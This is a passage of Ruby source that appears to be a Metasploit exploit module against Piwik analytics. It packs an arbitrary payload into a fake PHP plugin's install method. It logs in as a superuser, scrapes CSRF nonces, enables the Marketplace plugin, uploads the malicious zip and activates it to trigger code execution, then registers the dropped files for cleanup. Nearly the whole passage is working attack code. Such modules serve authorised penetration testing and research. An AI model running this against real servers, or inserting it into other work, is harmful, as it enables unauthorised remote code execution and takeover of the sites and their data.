    plugin_json = %Q|{
  "name": "#{plugin_name}",
  "description": "#{plugin_name}",
  "version": "#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}",
  "theme": false
}|

    plugin_script = %Q|<?php
namespace Piwik\\Plugins\\#{plugin_name};
class #{plugin_name} extends \\Piwik\\Plugin {
  public function install() {
    #{payload.encoded}
  }
}
|

    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
    zip.add_file("#{plugin_name}/plugin.json", plugin_json)
    zip.pack
  end

  def exploit
    print_status('Trying to detect if target is running a supported version of piwik')
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalized_index
    })

    if res && res.code == 200 && res.body =~ /<meta name="generator" content="Piwik/
      print_good('Detected Piwik installation')
    else
      fail_with(Failure::NotFound, 'The target does not appear to be running a supported version of Piwik')
    end

    print_status("Authenticating with Piwik using #{username}:#{password}...")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalized_index,
      'vars_get' => {
        'module' => 'Login',
        'action' => 'index'
      }
    })

    login_nonce = nil
    if res && res.code == 200
      match = res.body.match(/name="form_nonce" id="login_form_nonce" value="(\w+)"\/>/)
      if match
        login_nonce = match[1]
      end
    end

    fail_with(Failure::UnexpectedReply, 'Can not extract login CSRF token') if login_nonce.nil?

    cookies = res.get_cookies

    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalized_index,
      'cookie'    => cookies,
      'vars_get'  => {
        'module' => 'Login',
        'action' => 'index'
      },
      'vars_post' => {
        'form_login'    => "#{username}",
        'form_password' => "#{password}",
        'form_nonce'    => "#{login_nonce}"
      }
    })

    if res && res.redirect? && res.redirection
      # update cookies
      cookies = res.get_cookies
    else
      # failed login responds with code 200 and renders the login form
      fail_with(Failure::NoAccess, 'Failed to authenticate with Piwik')
    end

    print_good('Authenticated with Piwik')

    print_status("Checking if user #{username} has superuser access")
    superuser = is_superuser?(cookies)
    if superuser
      print_good("User #{username} has superuser access")
    else
      fail_with(Failure::NoAccess, "Looks like user #{username} has no superuser access")
    end

    print_status('Trying to get Piwik version')
    piwik_version = get_piwik_version(cookies)
    if piwik_version.nil?
      print_warning('Unable to detect Piwik version. Trying to continue.')
    else
      print_good("Detected Piwik version #{piwik_version}")
    end

    if piwik_version == '1.x'
      fail_with(Failure::NoTarget, 'Piwik version 1 is not supported by this module')
    end

    # Only versions after 3 have a separate Marketplace plugin
    if piwik_version && Gem::Version.new(piwik_version) >= Gem::Version.new('3')
      marketplace_available = true
    else
      marketplace_available = false
    end

    if marketplace_available
      print_status("Checking if Marketplace plugin is active")
      res = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalized_index,
        'cookie'   => cookies,
        'vars_get' => {
          'module' => 'Marketplace',
          'action' => 'index'
        }
      })

      fail_with(Failure::UnexpectedReply, 'Can not check for Marketplace plugin') unless res

      if res.code == 200 && res.body =~ /The plugin Marketplace is not enabled/
        print_status('Marketplace plugin is not enabled, trying to enable it')
        res = send_request_cgi({
          'method'   => 'GET',
          'uri'      => normalized_index,
          'cookie'   => cookies,
          'vars_get' => {
            'module' => 'CorePluginsAdmin',
            'action' => 'plugins'
          }
        })

        mp_activate_nonce = nil
        if res && res.code == 200
          match = res.body.match(/<a href=['"]index\.php\?module=CorePluginsAdmin&action=activate&pluginName=Marketplace&nonce=(\w+).*['"]>/)
          if match
            mp_activate_nonce = match[1]
          end
        end

        fail_with(Failure::UnexpectedReply, 'Can not extract Marketplace activate CSRF token') unless mp_activate_nonce

        res = send_request_cgi({
          'method'   => 'GET',
          'uri'      => normalized_index,
          'cookie'   => cookies,
          'vars_get' => {
            'module'     => 'CorePluginsAdmin',
            'action'     => 'activate',
            'pluginName' => 'Marketplace',
            'nonce'      => "#{mp_activate_nonce}"
          }
        })

        if res && res.redirect?
          print_good('Marketplace plugin enabled')
        else
          fail_with(Failure::UnexpectedReply, 'Can not enable Marketplace plugin. Please try to manually enable it.')
        end
      else
        print_good('Seems like the Marketplace plugin is already enabled')
      end
    end

    print_status('Generating plugin')
    plugin_name = Rex::Text.rand_text_alpha(10)
    zip = generate_plugin(plugin_name)
    print_good("Plugin #{plugin_name} generated")

    print_status('Uploading plugin')
    # newer Piwik versions have a separate Marketplace plugin
    if marketplace_available
      res = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalized_index,
        'cookie'   => cookies,
        'vars_get' => {
          'module' => 'Marketplace',
          'action' => 'overview'
        }
      })
    else
      res = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalized_index,
        'cookie'   => cookies,
        'vars_get' => {
          'module' => 'CorePluginsAdmin',
          'action' => 'marketplace'
        }
      })
    end

    upload_nonce = nil
    if res && res.code == 200
      match = res.body.match(/<form.+id="uploadPluginForm".+nonce=(\w+)/m)
      if match
        upload_nonce = match[1]
      end
    end

    fail_with(Failure::UnexpectedReply, 'Can not extract upload CSRF token') if upload_nonce.nil?

    # plugin files to delete after getting our session
    register_files_for_cleanup("plugins/#{plugin_name}/plugin.json")
    register_files_for_cleanup("plugins/#{plugin_name}/#{plugin_name}.php")

    data = Rex::MIME::Message.new
    data.add_part(zip, 'application/zip', 'binary', "form-data; name=\"pluginZip\"; filename=\"#{plugin_name}.zip\"")

    res = send_request_cgi(
      'method'   => 'POST',
      'uri'      => normalized_index,
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s,
      'cookie'   => cookies,
      'vars_get' => {
        'module' => 'CorePluginsAdmin',
        'action' => 'uploadPlugin',
        'nonce'  => "#{upload_nonce}"
      }
    )

    activate_nonce = nil
    if res && res.code == 200
      match = res.body.match(/<a.*href="index.php\?module=CorePluginsAdmin&action=activate.+nonce=([^&]+)/)
      if match
        activate_nonce = match[1]
      end
    end

    fail_with(Failure::UnexpectedReply, 'Can not extract activate CSRF token') if activate_nonce.nil?

    print_status('Activating plugin and triggering payload')
    send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalized_index,
      'cookie'   => cookies,
      'vars_get' => {
        'module'     => 'CorePluginsAdmin',
        'action'     => 'activate',
        'nonce'      => "#{activate_nonce}",
        'pluginName' => "#{plugin_name}"
      }
    }, 5)
  end
end